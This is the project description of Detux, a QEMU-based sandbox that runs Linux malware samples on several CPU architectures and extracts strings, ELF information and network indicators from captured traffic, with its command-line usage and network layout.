Detux: The Multiplatform Linux Sandbox

Introduction:

It is a sandbox developed to do traffic analysis of the Linux malwares and capture the IOCs by doing so. QEMU hypervisor is used to emulate Linux (Debian) for various CPU architectures.

The following CPUs are currently supported:

• x86
• x86-64
• ARM
• MIPS
• MIPSEL

What’s in the report?

– Static Analysis
— Basic strings extracted from binary
— ELF information generated by readelf commands
— the report.py can be modified to add more 3rd party commands to analyze the binary and add the result to DICT.

– Dynamic Analysis
— The captured pcaps are parsed with DPKT to extract the IOC’s and readable info from the packets.

Architecture

• Host ( The host itself can be a VM or a baremetal machine)
  • QEMU
  • dumpcap
  • DETUX Scripts

Network Arch

– NIC1 : This interface is for accessing the Host
– NIC2 : Interface bridged with the QEMU Sandbox VMs. One can redirect the traffic from the interface to WHONIX or REMNUX or a custom Gateway to filter/allow internet access for the Sandboxed VMs.

VM Setup

Usage

usage: detux.py [-h] --sample SAMPLE [--cpu {x86,x86-64,arm,mips,mipsel}]

                [--int {python,perl,sh,bash}] --report REPORT



optional arguments:

  -h, --help            show this help message and exit

  --sample SAMPLE       Sample path (default: None)

  --cpu {x86,x86-64,arm,mips,mipsel}

                        CPU type (default: auto)

  --int {python,perl,sh,bash}

                        Architecture type (default: None)

  --report REPORT       JSON report output path (default: None)

Copyright (c) 2015 Vikas Iyengar, iyengar.vikas@gmail.com (http://garage4hackers.com)
Copyright (c) 2016 Detux Sandbox, http://detux.org

Source: https://github.com/detuxsandbox/